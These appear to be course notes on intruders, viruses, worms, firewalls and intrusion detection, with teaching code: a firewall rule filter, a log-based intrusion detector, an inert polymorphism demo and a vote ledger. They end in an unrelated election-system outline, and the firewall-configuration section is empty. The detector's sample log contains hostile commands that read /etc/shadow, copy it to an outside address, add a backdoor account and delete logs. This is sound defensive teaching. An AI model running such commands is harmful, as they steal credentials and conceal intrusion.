Unit 5
Uploaded by: vamsi
Intruders, Viruses, & Firewalls

Understanding Intruders, Viruses, & Firewalls: Safeguarding Your Digital Environment
Introduction to Intruders
• Definition: Individuals or automated programs attempting unauthorized access to systems or networks.
• Methods: Phishing, malware, social engineering.
• Impact: Data theft, system disruption, unauthorized access.

Understanding Viruses
• Definition: Malicious software that replicates by infecting other files or systems.
• Types: File viruses, macro viruses, boot sector viruses.
• Spread: Email attachments, infected websites, software downloads.
Risks of Intruders and Viruses
• Data Loss: Confidential information compromised.
• System Disruption: Downtime and loss of productivity.
• Identity Theft: Personal and financial information exposed.
[Visual: graph showing the increase in cyber security incidents due to intruders and viruses]
Introduction to Firewalls
• Definition: Network security devices or software that control traffic based on predefined rules.
• Purpose: Prevent unauthorized access, block malicious traffic, enforce security policies.
• Types: Hardware appliances, software programs, cloud-based services.
Firewall Functionality
• Traffic Filtering: Based on IP addresses, port numbers, protocols.
• Intrusion Detection: Identify and respond to suspicious activity (a feature of next-generation firewalls and IPS products, not of a basic packet filter).
• Application Awareness: Control access to specific applications.
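The traffic-filtering function above is easiest to understand as a rule table evaluated in order. The following Python example is added here to show that; it is not code from the slides or from any firewall product. It implements first-match packet filtering with a default-deny policy over a constructed rule set for a DMZ web server (the address 203.0.113.10 and the 10.0.0.0/8 internal range are assumptions), and it also shows the check a practitioner wants when auditing a rule base: finding rules that an earlier, broader rule shadows so that they can never fire.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    action: str    # "allow" or "deny"
    proto: str     # "tcp", "udp", "icmp" or "any"
    src: str       # CIDR or "any"
    dst: str       # CIDR or "any"
    dport: object  # int, (low, high) tuple, or "any"


@dataclass(frozen=True)
class Packet:
    proto: str
    src: str
    dst: str
    dport: int


def _net_has(spec, ip):
    return spec == "any" or ipaddress.ip_address(ip) in ipaddress.ip_network(spec, strict=False)


def _port_has(spec, port):
    if spec == "any":
        return True
    low, high = spec if isinstance(spec, tuple) else (spec, spec)
    return low <= port <= high


def rule_matches(rule, pkt):
    return (rule.proto in ("any", pkt.proto) and _net_has(rule.src, pkt.src)
            and _net_has(rule.dst, pkt.dst) and _port_has(rule.dport, pkt.dport))


def filter_packet(rules, pkt, default="deny"):
    """First-match evaluation: the first rule whose fields all match decides the
    packet; if no rule matches, the default policy (deny here) applies."""
    for rule in rules:
        if rule_matches(rule, pkt):
            return rule.action
    return default


# Containment tests used to find rules that can never fire.
def _net_contains(outer, inner):
    if outer == "any":
        return True
    if inner == "any":
        return False
    return ipaddress.ip_network(inner, strict=False).subnet_of(ipaddress.ip_network(outer, strict=False))


def _port_contains(outer, inner):
    if outer == "any":
        return True
    if inner == "any":
        return False
    lo_o, hi_o = outer if isinstance(outer, tuple) else (outer, outer)
    lo_i, hi_i = inner if isinstance(inner, tuple) else (inner, inner)
    return lo_o <= lo_i and hi_i <= hi_o


def shadowed_rules(rules):
    """Indexes of rules fully covered by an earlier rule, so they can never match."""
    return [j for j, later in enumerate(rules) if any(
        earlier.proto in ("any", later.proto) and _net_contains(earlier.src, later.src)
        and _net_contains(earlier.dst, later.dst) and _port_contains(earlier.dport, later.dport)
        for earlier in rules[:j])]


WEB = "203.0.113.10"  # constructed DMZ web server address (assumption)
RULES = [
    Rule("allow", "tcp", "any", WEB, 443),        # public HTTPS
    Rule("allow", "tcp", "10.0.0.0/8", WEB, 22),  # SSH only from the internal network
    Rule("deny", "any", "any", "any", "any"),     # explicit clean-up rule
]
# Misordered variant: a broad allow placed first shadows every rule after it.
SHADOWED = [Rule("allow", "any", "any", "any", "any")] + RULES


def evaluate(rules):
    """Run a few constructed packets through the rule set and report the verdicts."""
    packets = {
        "https_from_internet": Packet("tcp", "198.51.100.4", WEB, 443),
        "ssh_from_internet": Packet("tcp", "198.51.100.4", WEB, 22),
        "ssh_from_inside": Packet("tcp", "10.1.2.3", WEB, 22),
        "udp_443_from_internet": Packet("udp", "198.51.100.4", WEB, 443),
    }
    return {name: filter_packet(rules, p) for name, p in packets.items()}


if __name__ == "__main__":
    print(evaluate(RULES), shadowed_rules(RULES))
    print(evaluate(SHADOWED), shadowed_rules(SHADOWED))
```

With RULES, only HTTPS from anywhere and SSH from inside are allowed and nothing is shadowed; with SHADOWED every packet is allowed and rules 1 to 3 are dead, which is exactly the misconfiguration a rule-base audit should catch.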
Types of Firewalls
• Network Firewalls: Control traffic between networks.
• Host-based Firewalls: Installed on individual devices.
• Next-Generation Firewalls (NGFWs): Add application awareness, intrusion prevention and deeper inspection on top of basic packet filtering.
Importance of Firewalls
• Protect Against Intruders and Viruses: Block malicious traffic.
• Safeguard Sensitive Data: Prevent unauthorized access.
• Enforce Security Policies: Control network access and behavior.
Best Practices for Security
• Install and Configure Firewalls: Tailored to organizational needs.
• Update Regularly: Keep software and definitions up to date.
• Educate Users: Train employees on cyber security awareness.
Conclusion
• Intruders seek unauthorized access, viruses infect systems, firewalls protect networks.
• Importance: Implementing robust security measures is essential.
• Call to Action: Enhance cybersecurity measures to safeguard digital assets.


Intrusion Detection:
Inevitably, the best intrusion prevention system will fail. A system's second line of defense is intrusion detection, and this has been the focus of much research in recent years. This interest is motivated by a number of considerations, including the following:
• If an intrusion is detected quickly enough, the intruder can be identified and ejected from the system before any damage is done or any data are compromised.
• An effective intrusion detection system can serve as a deterrent and thus help prevent intrusions.
• Intrusion detection enables the collection of information about intrusion techniques that can be used to strengthen the intrusion prevention facility.
Approaches to intrusion detection:
1. Statistical anomaly detection: Involves the collection of data relating to the behavior of legitimate users over a period of time. Statistical tests are then applied to observed behavior to determine with a high level of confidence whether that behavior is not legitimate user behavior.
   • Threshold detection: This approach involves defining thresholds, independent of user, for the frequency of occurrence of various events.
   • Profile based: A profile of the activity of each user is developed and used to detect changes in the behavior of individual accounts.
2. Rule-based detection: Involves an attempt to define a set of rules that can be used to decide that a given behavior is that of an intruder.
   • Anomaly detection: Rules are developed to detect deviation from previous usage patterns.
   • Penetration identification: An expert system approach that searches for suspicious behavior.
Statistical anomaly detection is effective against masqueraders, who are unlikely to mimic the behavior patterns of the accounts they appropriate. It is less useful against misfeasors (legitimate users abusing their privileges), whose activity may stay within their own profile; rule-based penetration identification, which looks for known attack patterns regardless of volume, is the better fit there.
Audit Records: A fundamental tool for intrusion detection is the audit record. Basically, two plans are used:
Native audit records: Virtually all multiuser operating systems include accounting software that collects information on user activity.
• The advantage of using this information is that no additional collection software is needed.
• The disadvantage is that the native audit records may not contain the needed information or may not contain it in a convenient form.
Detection-specific audit records: A collection facility can be implemented that generates audit records containing only that information required by the intrusion detection system.
• One advantage of such an approach is that it could be made vendor independent and ported to a variety of systems.
• The disadvantage is the extra overhead involved in having, in effect, two accounting packages running on a machine.
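The two sections above (the three detection approaches, and native versus detection-specific audit records) are easiest to see together on real-looking data. The Python example below is added here and is not code from the page: it distils constructed auth.log-style native audit records (the host, users and addresses are invented) into detection-specific records carrying only the fields the detectors need, then runs threshold detection (a user-independent limit on failed logins), profile-based detection (per-user baseline of login hour and privileged commands per day, built from days 10 to 12 and applied to day 13) and rule-based penetration identification (known-bad actions such as reading /etc/shadow or deleting logs) over them. The tolerance of two standard deviations floored at one unit is an assumption chosen so a perfectly regular baseline does not alert on trivial deviations.

```python
import re
import statistics
from collections import Counter, defaultdict

# Constructed auth.log-style native audit records (invented for this example;
# hosts, users and addresses are not from the page). Days 10-12 are alice's
# routine; on day 13 "alice" logs in at 03:14 from a new address and runs a burst
# of privileged commands, while another source hammers root with bad passwords.
NATIVE_AUDIT_LOG = """\
Mar 10 09:02:11 host sshd[411]: Accepted password for alice from 10.0.0.5 port 51222 ssh2
Mar 10 09:15:40 host sudo: alice : COMMAND=/usr/bin/less /var/log/syslog
Mar 11 09:05:02 host sshd[412]: Accepted password for alice from 10.0.0.5 port 51300 ssh2
Mar 11 09:40:13 host sudo: alice : COMMAND=/usr/bin/tail /var/log/syslog
Mar 12 09:01:55 host sshd[413]: Accepted password for alice from 10.0.0.5 port 51410 ssh2
Mar 12 10:12:00 host sudo: alice : COMMAND=/usr/bin/less /var/log/auth.log
Mar 13 03:14:07 host sshd[414]: Accepted password for alice from 198.51.100.7 port 40001 ssh2
Mar 13 03:14:30 host sudo: alice : COMMAND=/usr/bin/cat /etc/shadow
Mar 13 03:14:31 host sudo: alice : COMMAND=/usr/bin/scp /etc/shadow 198.51.100.7:/tmp/
Mar 13 03:14:32 host sudo: alice : COMMAND=/usr/sbin/useradd backdoor
Mar 13 03:14:33 host sudo: alice : COMMAND=/usr/bin/chattr +i /etc/passwd
Mar 13 03:14:34 host sudo: alice : COMMAND=/bin/rm /var/log/auth.log
Mar 13 04:00:01 host sshd[415]: Failed password for root from 203.0.113.9 port 2222 ssh2
Mar 13 04:00:02 host sshd[415]: Failed password for root from 203.0.113.9 port 2223 ssh2
Mar 13 04:00:03 host sshd[415]: Failed password for root from 203.0.113.9 port 2224 ssh2
Mar 13 04:00:04 host sshd[415]: Failed password for root from 203.0.113.9 port 2225 ssh2
"""

TS = r"^\w{3} +(?P<day>\d+) (?P<hour>\d\d):\d\d:\d\d \S+ "
PATTERNS = {  # only the event types the detectors need; everything else is dropped
    "login_ok": re.compile(TS + r"sshd\[\d+\]: Accepted \w+ for (?P<user>\S+) from (?P<src>\S+)"),
    "login_fail": re.compile(TS + r"sshd\[\d+\]: Failed \w+ for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)"),
    "sudo": re.compile(TS + r"sudo: +(?P<user>\S+) : .*COMMAND=(?P<cmd>.+)$"),
}


def to_detection_records(log_text):
    """Native audit lines -> detection-specific records (day, hour, user, event, src, cmd)."""
    records = []
    for line in log_text.splitlines():
        for event, rx in PATTERNS.items():
            m = rx.match(line)
            if m:
                d = m.groupdict()
                records.append({"day": int(d["day"]), "hour": int(d["hour"]), "user": d["user"],
                                "event": event, "src": d.get("src"), "cmd": d.get("cmd")})
                break
    return records


def threshold_alerts(records, max_failures=3):
    """Threshold detection: one user-independent limit on event frequency."""
    per_src = Counter(r["src"] for r in records if r["event"] == "login_fail")
    return [f"{src}: {n} failed logins" for src, n in per_src.items() if n > max_failures]


def build_profiles(records, baseline_days):
    """Profile-based detection, step 1: per-user baseline of login hour and of
    privileged commands per day (tolerance 2 std devs, floored at 1: assumption)."""
    hours, sudo_per_day = defaultdict(list), defaultdict(Counter)
    for r in records:
        if r["day"] in baseline_days and r["event"] == "login_ok":
            hours[r["user"]].append(r["hour"])
        elif r["day"] in baseline_days and r["event"] == "sudo":
            sudo_per_day[r["user"]][r["day"]] += 1
    profiles = {}
    for user, hs in hours.items():
        counts = [sudo_per_day[user][d] for d in baseline_days]
        profiles[user] = {"hour_mean": statistics.mean(hs), "hour_tol": max(2 * statistics.pstdev(hs), 1),
                          "sudo_mean": statistics.mean(counts), "sudo_tol": max(2 * statistics.pstdev(counts), 1)}
    return profiles


def profile_alerts(records, profiles, observed_days):
    """Profile-based detection, step 2: flag observed behaviour outside the profile."""
    alerts, sudo_per_day = [], defaultdict(Counter)
    for r in records:
        p = profiles.get(r["user"])
        if p is None or r["day"] not in observed_days:
            continue
        if r["event"] == "login_ok" and abs(r["hour"] - p["hour_mean"]) > p["hour_tol"]:
            alerts.append(f"{r['user']}: login at {r['hour']:02d}h from {r['src']} outside profile")
        elif r["event"] == "sudo":
            sudo_per_day[r["user"]][r["day"]] += 1
    for user, days in sudo_per_day.items():
        for day, n in days.items():
            if n - profiles[user]["sudo_mean"] > profiles[user]["sudo_tol"]:
                alerts.append(f"{user}: {n} privileged commands on day {day}, baseline {profiles[user]['sudo_mean']:.1f}")
    return alerts


PENETRATION_RULES = [  # rule-based penetration identification: known-bad actions regardless of volume
    ("credential file access", re.compile(r"/etc/shadow")),
    ("log tampering", re.compile(r"\brm\b.*/var/log/")),
    ("account creation", re.compile(r"\buseradd\b")),
]


def rule_alerts(records):
    return [f"{r['user']}: {name} ({r['cmd']})" for r in records if r["event"] == "sudo"
            for name, rx in PENETRATION_RULES if rx.search(r["cmd"])]


def analyse(log_text=NATIVE_AUDIT_LOG, baseline_days=(10, 11, 12), observed_days=(13,)):
    recs = to_detection_records(log_text)
    profiles = build_profiles(recs, set(baseline_days))
    return {"threshold": threshold_alerts(recs),
            "profile": profile_alerts(recs, profiles, set(observed_days)),
            "rules": rule_alerts(recs)}


if __name__ == "__main__":
    print(analyse())
```

Note what each approach contributes on this data: the threshold catches the password-guessing source, the profile catches the masquerader (a 03:00 login when alice always logs in at 09:00, and five privileged commands against a baseline of one), and the rules catch the specific dangerous actions even though each one is a single event that no statistical test would notice.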
Name                   Description
Virus                  Attaches itself to a program and propagates copies of itself to other programs
Worm                   Program that propagates copies of itself to other computers
Logic bomb             Triggers action when condition occurs
Trojan horse           Program that contains unexpected additional functionality
Backdoor (trapdoor)    Program modification that allows unauthorized access to functionality
Exploits               Code specific to a single vulnerability or set of vulnerabilities
Downloaders            Program that installs other items on a machine that is under attack. Usually, a downloader is sent in an e-mail.
Auto-rooter            Malicious hacker tools used to break into new machines remotely
Kit (virus generator)  Set of tools for generating new viruses automatically
Spammer programs       Used to send large volumes of unwanted e-mail
Flooders               Used to attack networked computer systems with a large volume of traffic to carry out a denial of service (DoS) attack
Keyloggers             Captures keystrokes on a compromised system
Rootkit                Set of hacker tools used after attacker has broken into a computer system and gained root-level access
Zombie                 Program installed on an infected machine that is activated to launch attacks on other machines
During its lifetime, a typical virus goes through the following four phases:
• Dormant phase: The virus is idle. The virus will eventually be activated by some event, such as a date, the presence of another program or file, or the capacity of the disk exceeding some limit. Not all viruses have this stage.
• Propagation phase: The virus places an identical copy of itself into other programs or into certain system areas on the disk. Each infected program will now contain a clone of the virus, which will itself enter a propagation phase.
• Triggering phase: The virus is activated to perform the function for which it was intended. As with the dormant phase, the triggering phase can be caused by a variety of system events, including a count of the number of times that this copy of the virus has made copies of itself.
• Execution phase: The function is performed. The function may be harmless, such as a message on the screen, or damaging, such as the destruction of programs and data files.
Worms: A worm is a program that can replicate itself and send copies from computer to computer across network connections. Upon arrival, the worm may be activated to replicate and propagate again. In addition to propagation, the worm usually performs some unwanted function.
An e-mail virus has some of the characteristics of a worm, because it propagates itself from system to system.
Network worm programs use network connections to spread from system to system. Once active within a system, a network worm can behave as a computer virus or bacteria, or it could implant Trojan horse programs or perform any number of disruptive or destructive actions.
Examples of the network vehicles a worm uses to replicate include the following:
• Electronic mail facility: A worm mails a copy of itself to other systems.
• Remote execution capability: A worm executes a copy of itself on another system.
• Remote login capability: A worm logs onto a remote system as a user and then uses commands to copy itself from one system to the other.
A network worm exhibits the same characteristics as a computer virus: a dormant phase, a propagation phase, a triggering phase, and an execution phase. The propagation phase generally performs the following functions:
1. Search for other systems to infect by examining host tables or similar repositories of remote system addresses.
2. Establish a connection with a remote system.
3. Copy itself to the remote system and cause the copy to be run.
State of Worm Technology
The state of the art in worm technology includes the following:
• Multiplatform: Newer worms are not limited to Windows machines but can attack a variety of platforms, especially the popular varieties of UNIX.
• Multiexploit: New worms penetrate systems in a variety of ways, using exploits against Web servers, browsers, e-mail, file sharing, and other network-based applications.
• Ultrafast spreading: One technique to accelerate the spread of a worm is to conduct a prior Internet scan to accumulate Internet addresses of vulnerable machines.
• Polymorphic: To evade detection, skip past filters, and foil real-time analysis, worms adopt the virus polymorphic technique. Each copy of the worm has new code generated on the fly using functionally equivalent instructions and encryption techniques.
• Metamorphic: In addition to changing their appearance, metamorphic worms have a repertoire of behavior patterns that are unleashed at different stages of propagation.
• Transport vehicles: Because worms can rapidly compromise a large number of systems, they are ideal for spreading other distributed attack tools, such as distributed denial of service zombies.
• Zero-day exploit: To achieve maximum surprise and distribution, a worm should exploit an unknown vulnerability that is only discovered by the general network community when the worm is launched.
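The "polymorphic" point above is the one that most directly changes how a defender must work, so here is an added Python illustration of why; it is not code from the page and contains no malware. The "worm body" is an inert ASCII string standing in for the constant logic every copy shares; each copy re-encodes it under a different single-byte XOR key (the encryption technique the text mentions) behind a small constant decryptor stub. A byte-pattern signature that matches the plain body matches none of the copies, while a scanner that recognises the stub, performs its decryption step and scans the result catches all of them. The stub format and the keys are assumptions of the example.

```python
import hashlib

# Constructed stand-in for a worm body: an inert ASCII string that does nothing.
BODY = b"MOCK-WORM: scan(); connect(); copy_self(); run();"
STATIC_SIGNATURE = b"copy_self(); run()"  # what a byte-pattern scanner would key on
STUB = b"DECRYPT:"                         # the constant decryptor stub every copy carries (assumed format)


def make_polymorphic_copy(body, key):
    """Polymorphism as the page describes it: the same logic, re-encoded per copy
    (single-byte XOR here) behind a small constant decryptor stub."""
    if not 1 <= key <= 255:
        raise ValueError("key 0 would leave the body unchanged; use 1..255")
    return STUB + bytes([key]) + bytes(b ^ key for b in body)


def signature_scan(blob, sig=STATIC_SIGNATURE):
    """Plain byte-pattern matching on the file as stored on disk."""
    return sig in blob


def emulated_scan(blob, sig=STATIC_SIGNATURE):
    """Recognise the stub, run its decryption step, then scan the decoded body:
    the generic-decryption approach scanners use when only the stub is constant."""
    if not blob.startswith(STUB) or len(blob) <= len(STUB):
        return signature_scan(blob, sig)
    key = blob[len(STUB)]
    decoded = bytes(b ^ key for b in blob[len(STUB) + 1:])
    return sig in decoded


def compare(keys=(0x21, 0x5A, 0xC3)):
    """Generate copies under several keys and count what each scanner finds."""
    copies = [make_polymorphic_copy(BODY, k) for k in keys]
    return {
        "distinct_hashes": len({hashlib.sha256(c).hexdigest() for c in copies}),
        "static_hits": sum(signature_scan(c) for c in copies),
        "emulated_hits": sum(emulated_scan(c) for c in copies),
        "static_hit_on_plain_body": signature_scan(BODY),
    }


if __name__ == "__main__":
    print(compare())
```

Every copy has a different hash and evades the static signature, yet all three are caught once the decryptor is emulated. Real engines face harder stubs (the decryptor itself is varied with equivalent instruction sequences, which is why behavioural and emulation-based detection matter), but the asymmetry shown here is the core of it.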
The Morris Worm
The Morris worm was designed to spread on UNIX systems and used a number of different techniques for propagation.
It attempted to log on to a remote host as a legitimate user. In this method, the worm first attempted to crack the local password file, and then used the discovered passwords and corresponding user IDs. The assumption was that many users would use the same password on different systems. To obtain the passwords, the worm ran a password-cracking program that tried:
• Each user's account name and simple permutations of it
• A list of 432 built-in passwords that Morris thought to be likely candidates
• All the words in the local system dictionary
It exploited a bug in the finger daemon (fingerd), the service that reports the whereabouts of a remote user.
It exploited a trapdoor in the debug option of the remote mail process (sendmail).
If any of these attacks succeeded, the worm achieved communication with the operating system command interpreter.
Recent Worm Attacks
In late 2001, a more versatile worm appeared, known as Nimda. Nimda spreads by multiple mechanisms:
• from client to client via e-mail
• from client to client via open network shares
• from Web server to client via browsing of compromised Web sites
• from client to Web server via active scanning for and exploitation of various Microsoft.
Firewall Configurations:
The three common firewall configurations:

Virtual Election System Architecture:
User Interface:
Voter Interface: A secure and user-friendly interface for voter registration, authentication,
and casting votes. This could be a web application or a mobile app.
Frontend:
Voter Registration Module: Allows users to register as voters by providing necessary
information.
Candidate Registration Module: Enables individuals to register as candidates for different
positions.
Authentication and Authorization:
User Authentication: Secure authentication mechanisms to ensure the identity of voters
and candidates.
Authorization: Role-based access control to manage permissions for different user roles.
Voting System:
Secure Voting Module: Provides a platform for voters to cast their votes securely. This
should include cryptographic methods to ensure the integrity and confidentiality of votes.
Voting Period Management: Controls the timing of the election phases, such as the
campaign period and the actual voting period.
Candidate Management:
Candidate Dashboard: Allows candidates to manage their campaign information, monitor
progress, and view results.
Campaign Period Control: Manages the timeline for candidate campaigns.
Back-end Server:
User Management: Manages voter and candidate data, including registration details and authentication.
Vote Management: Collects, stores, and processes votes securely.
Results Calculation: Calculates and verifies election results.
Security Measures: Implements security protocols to protect against attacks, including
encryption, firewalls, and intrusion detection systems.
Database:
Voter Database: Stores information about registered voters.
Candidate Database: Stores information about candidates.
Vote Database: Securely stores cast votes with proper encryption.
Blockchain Integration (Optional):
Distributed Ledger: Provides an immutable record of votes to enhance transparency and integrity.
Smart Contracts: Automates certain aspects of the election process, such as vote counting.
External Systems Integration:
Identity Verification Services: Integrates with identity verification services for additional
authentication.
Notification Services: Sends notifications to users about important events in the election
process.
Security Measures:
SSL/TLS Encryption: Ensures secure communication between clients and servers.
Multi-Factor Authentication (MFA): Adds an extra layer of security for user authentication.
Regular Security Audits: Conducts regular security audits and vulnerability assessments.
Results Presentation:
Results Dashboard: Displays election results to the public in real-time (if permissible) or after
the voting period ends.
Audit Trail:
Audit Logging: Maintains detailed logs of all activities for auditing purposes.
Compliance and Regulations:
Compliance Module: Ensures that the virtual election system complies with relevant electoral
laws and regulations.
Disaster Recovery and Redundancy:
Data Backup: Regularly backs up critical data to prevent data loss.
Redundancy: Implements redundant systems to ensure continuous operation in case of
system failures.
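Several components above (the Secure Voting Module's "cryptographic methods to ensure integrity", the Vote Database, the Distributed Ledger and the Audit Trail) amount to the same requirement: once a vote is recorded it must be impossible to alter, remove or count twice without detection. The Python example below is added here to show the minimum mechanism that meets it; it is not code from the page or from any election product. Each ledger entry commits to the previous entry's keyed hash (HMAC-SHA256 under an audit key), voter identities are replaced by an HMAC token under a separate key so double voting is rejected without the ledger revealing who voted, and the tally refuses to run unless the whole chain verifies. The keys and the ballots are constructed for the example.

```python
import hashlib
import hmac
import json

GENESIS = "0" * 64  # previous-hash value for the first entry


class VoteLedger:
    """Append-only, hash-chained record of cast votes."""

    def __init__(self, chain_key: bytes, voter_key: bytes):
        self.chain_key = chain_key  # held by the audit authority; every link is keyed with it
        self.voter_key = voter_key  # separate key: voter identities never appear in the ledger
        self.entries = []
        self._seen_tokens = set()

    def _voter_token(self, voter_id):
        return hmac.new(self.voter_key, voter_id.encode(), hashlib.sha256).hexdigest()

    def _link(self, index, prev, ballot):
        msg = json.dumps({"i": index, "prev": prev, "ballot": ballot}, sort_keys=True).encode()
        return hmac.new(self.chain_key, msg, hashlib.sha256).hexdigest()

    def cast(self, voter_id, choice):
        """Record one ballot; returns False if this voter has already voted."""
        token = self._voter_token(voter_id)
        if token in self._seen_tokens:
            return False
        self._seen_tokens.add(token)
        prev = self.entries[-1]["hash"] if self.entries else GENESIS
        ballot = {"token": token, "choice": choice}
        entry = {"i": len(self.entries), "prev": prev, "ballot": ballot}
        entry["hash"] = self._link(entry["i"], prev, ballot)
        self.entries.append(entry)
        return True

    def verify(self):
        """Index of the first entry whose link is broken, or None if intact."""
        prev = GENESIS
        for i, e in enumerate(self.entries):
            expected = self._link(i, prev, e["ballot"])
            if e["i"] != i or e["prev"] != prev or not hmac.compare_digest(e["hash"], expected):
                return i
            prev = e["hash"]
        return None

    def tally(self):
        if self.verify() is not None:
            raise ValueError("ledger integrity check failed; refusing to count")
        counts = {}
        for e in self.entries:
            counts[e["ballot"]["choice"]] = counts.get(e["ballot"]["choice"], 0) + 1
        return counts


def demo():
    """Cast constructed votes (one duplicate), tally, then tamper and re-verify."""
    ledger = VoteLedger(chain_key=b"audit-key-demo", voter_key=b"voter-key-demo")  # constructed keys
    votes = [("voter-1", "A"), ("voter-2", "B"), ("voter-1", "B"), ("voter-3", "A")]
    results = {"accepted": [ledger.cast(v, c) for v, c in votes]}
    results["tally"] = ledger.tally()
    results["intact"] = ledger.verify()
    ledger.entries[1]["ballot"]["choice"] = "A"  # an insider flips one recorded vote
    results["first_bad_after_tamper"] = ledger.verify()
    return results


if __name__ == "__main__":
    print(demo())
```

The duplicate from voter-1 is rejected, the tally is A: 2, B: 1, and after the flipped vote verification stops at entry 1. Deleting or reordering entries fails the same check because each entry carries its index and its predecessor's hash. What this does not provide is verifiability by voters themselves or protection against the audit-key holder; those need the signatures or a genuinely distributed ledger the architecture lists as optional.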
